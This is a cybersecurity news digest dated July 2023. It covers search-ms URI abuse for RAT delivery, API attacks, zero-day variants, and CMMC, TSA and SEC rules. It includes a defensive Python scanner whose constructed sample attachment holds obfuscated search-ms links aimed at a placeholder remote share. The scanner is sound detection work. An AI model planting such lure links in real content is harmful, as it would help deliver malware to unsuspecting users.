Project Hyphae

Information Security News 7-31-2023


Hackers Abusing Windows Search Feature to Install Remote Access Trojans

Article Link:

  • According to Trellix, a legitimate Windows search feature, search-ms URI protocol handler, is being exploited by unknown malicious actors to download arbitrary payloads from remote servers and compromise targeted systems with remote access trojans, such as AsyncRAT and Remcos RAT.
  • In many of the attacks, bad actors send phishing HTML attachments leading to compromised websites that use JavaScript to exploit the Windows feature.
  • Researchers noted that malicious hackers have also tried putting dangerous links in PDFs and other shared files to create the illusion of security.
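The digest only summarizes how the search-ms: handler is abused, so here is an added defender-side example (it is not code from Trellix's report or from this page): a small Python scanner that normalizes an HTML attachment's entities, JavaScript escapes and percent-encoding, extracts every search-ms: URI, and flags those whose location crumb points at a UNC path rather than a local folder. The sample attachment, its inline script and the hostname files.example.invalid are constructed for the demonstration.

```python
import html
import re
from urllib.parse import unquote

# The Windows Search protocol scheme; query= and crumb= follow the documented
# search-ms URI syntax. The character class stops at whitespace and quotes.
SEARCH_MS_RE = re.compile(r"search-ms:[^\s\"'<>]*", re.IGNORECASE)

# Constructed sample of an HTML email attachment (not taken from any report).
SAMPLE_ATTACHMENT = r"""
<html><body>
<a href="search-ms:query=Invoice&crumb=location:\\files.example.invalid\share&displayname=Downloads">Open invoice</a>
<script>
  // constructed: scheme hidden behind a JS hex escape, backslashes percent-encoded
  window.location = "\x73earch-ms:query=report&crumb=location:%5C%5Cfiles.example.invalid%5Cshare";
</script>
</body></html>
"""


def _decode_js_escapes(text: str) -> str:
    """Resolve \\xNN and \\uNNNN escapes that a script could use to hide the scheme."""
    text = re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), text)
    return re.sub(r"\\u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), text)


def normalize(content: str) -> str:
    """Best-effort removal of the encodings commonly layered over a URI in HTML/JS."""
    out = html.unescape(content)      # &#115;earch-ms:  -> search-ms:
    out = _decode_js_escapes(out)     # "\x73earch-ms:"  -> "search-ms:"
    return unquote(out)               # %5C%5Chost        -> \\host


def find_search_ms_uris(content: str) -> list[str]:
    """Return every search-ms: URI visible after normalization."""
    return SEARCH_MS_RE.findall(normalize(content))


def parse_search_ms(uri: str) -> dict[str, str]:
    """Split 'search-ms:k=v&k2=v2' into a lowercase-keyed parameter dict."""
    params: dict[str, str] = {}
    for part in uri[len("search-ms:"):].split("&"):
        key, _, value = part.partition("=")
        if key:
            params[key.lower()] = value
    return params


def is_remote_location(params: dict[str, str]) -> bool:
    """True when the crumb points the search at a UNC path (\\\\host\\share)."""
    crumb = params.get("crumb", "").lower()
    return crumb.startswith("location:\\\\")


def scan(content: str) -> list[dict]:
    """Produce one finding per search-ms: URI, with a verdict a mail gateway could act on."""
    findings = []
    for uri in find_search_ms_uris(content):
        params = parse_search_ms(uri)
        remote = is_remote_location(params)
        findings.append({
            "uri": uri,
            "query": params.get("query", ""),
            "crumb": params.get("crumb", ""),
            "remote_location": remote,
            "verdict": ("remote search-ms URI: block and alert" if remote
                        else "search-ms URI present: review"),
        })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_ATTACHMENT):
        print(finding["verdict"], "->", finding["crumb"])
```

The normalization order matters: entities first, then JavaScript escapes, then percent-decoding, so that a scheme split across encodings still reassembles before the pattern match. A crumb that points at a local folder is reported for review rather than blocked, since search-ms: links to local content are legitimate; a UNC location inside an email attachment is the signal worth alerting on.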

Why API Attacks are Increasing and How to Avoid Them

Article Link:

  • As the adoption of APIs (Application Programming Interfaces) grows, so does the number of attacks against them by malicious actors.
  • The article attributes the rise in API attacks to several causes: APIs are exposed to network requests, which expands the attack surface; they are intentionally easy to find and use; companies deploy cloud-based applications built from many small components; potentially malicious data can be transmitted in pieces; and APIs are easy enough to deploy that IT teams often are not informed of their use.
  • Issues with authorization and authentication further degrade API security. Faced with this range of problems, many organizations are turning to automation platforms to manage the large number of APIs they have in place.

In 2022, More Than 40% of Zero-Day Exploits Used in the Wild Were Variations of Previous Issues

Article Link:

  • According to Google Threat Analysis Group researchers, more than 40% of zero-day exploits used in the wild were variations of previous issues. Google’s data identified 41 zero-days, 17 of which were variants of previously fixed bugs.
  • Google noted that the number of zero-days dropped, presumably due to an increase in zero-click exploits and new browser extension mitigations designed to thwart malicious actors.
  • Maddie Stone, one of Google’s researchers, encourages vendors to provide patches and mitigations to end-users as fast as possible and suggests that developers share more details about the root causes of the flaws.

DOD, OMB Expect September Release of Proposed CMMC Rule

Article Link:

  • The Department of Defense and Office of Management and Budget (OMB) have updated the timeline for the new proposed CMMC rules to be released in September 2023. 
  • It was noted that the OMB received the proposed rule to begin the review process on July 24th, suggesting that the initial ruleset release and request-for-comment period will arrive soon.
  • Once the rules are opened for public comment, the final rulemaking process will take at least another 6 months to complete. As such, the final CMMC rules are set to be released in mid-2024, at the earliest.

TSA Updates Pipeline Cybersecurity Requirements

Article Link:

  • The Transportation Security Administration has recently released an updated version of cybersecurity requirements for oil, natural gas, and other hazardous materials pipeline owners and operators.
  • Remaining in place are previous requirements to report significant cybersecurity incidents to CISA, identify a cybersecurity point of contact, and conduct a cybersecurity vulnerability assessment.
  • Updates are as follows: Pipeline owners and operators must establish and implement a TSA-approved Cybersecurity Implementation Plan, develop and maintain an incident response plan, and develop a Cybersecurity Assessment Plan. The Cybersecurity Assessment Plan must be submitted to the TSA for review and approval annually, show results from previous years with a schedule for assessing and auditing security measures, and test at least two Cyber Incident Response Plan (CIRP) objectives annually. Additionally, 100% of all cybersecurity measures must be assessed every three years.
  • Link to the TSA’s Revisions:
  • Link to the TSA’s Cybersecurity Toolkit:

SEC Issues Final Rules on Cybersecurity Disclosure for Public Companies

Article Link:

  • The SEC adopted final rules relating to the cybersecurity disclosures of public companies. Several rules were adopted, the most prominent being that material cybersecurity incidents must be reported within four days and that there must be an annual disclosure of a company’s processes to address material cybersecurity risks.
  • The reporting rules will come into effect either 90 days after publication in the Federal Register or on December 18, 2023, whichever is later, with longer extensions for smaller organizations. Likewise, the disclosures will be required in annual reports for fiscal years ending on or after December 15, 2023.
  • The rules also received a number of changes prior to the final adoption. These include a narrowing of the scope for incident disclosure, addition of a limited delay for disclosures that have national security or public safety risk, and removal of the disclosure of board cybersecurity expertise.
  • Link to the SEC’s Final Rules:

Why CISOs Should Get Involved with Cyber Insurance Negotiation

Article Link:

  • While CISOs often are included in cyber insurance discussions at large companies, small and some midsize organizations might not have a corporate CISO position and are thus at a disadvantage, especially if there is an insurance claim.
  • Essentially, without IT or Security personnel at the table, organizations often have non-technology personnel addressing cybersecurity issues, adding risk to organizations rather than transferring it.
  • When organizations fail to answer cyber insurance applications accurately, they risk having claims denied or having the insurer sue them. As such, it is vital that the personnel interacting with cyber insurance at a contractual level, typically a finance leader or a general counsel, are working closely with technical personnel.
